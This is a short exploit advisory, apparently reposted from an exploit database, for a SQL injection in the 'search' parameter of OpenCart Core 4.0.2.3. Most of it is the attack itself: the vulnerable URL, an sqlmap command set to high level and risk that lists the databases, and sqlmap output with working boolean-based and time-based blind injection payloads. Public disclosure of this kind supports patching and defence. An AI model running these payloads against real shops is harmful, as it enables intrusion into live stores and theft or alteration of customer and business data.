Headline
OpenCart Core 4.0.2.3 SQL Injection
OpenCart Core version 4.0.2.3 suffers from a remote SQL injection vulnerability.
# Exploit Title: OpenCart Core 4.0.2.3 - 'search' SQLi# Date: 2024-04-2# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.opencart.com/# Software Link: https://github.com/opencart/opencart/releases# Version: 4.0.2.3# Tested on: XAMPP, Linux# Contact: https://twitter.com/dmaral3noz* Description :Opencart allows SQL Injection via parameter 'search' in /index.php?route=product/search&search=.Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.* Steps to Reproduce :- Go to : http://127.0.0.1/index.php?route=product/search&search=test- New Use command Sqlmap : sqlmap -u "http://127.0.0.1/index.php?route=product/search&search=#1" --level=5 --risk=3 -p search --dbs===========Output :Parameter: search (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: route=product/search&search=') AND 2427=2427-- drCaType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: route=product/search&search=') AND (SELECT 8368 FROM (SELECT(SLEEP(5)))uUDJ)-- Nabb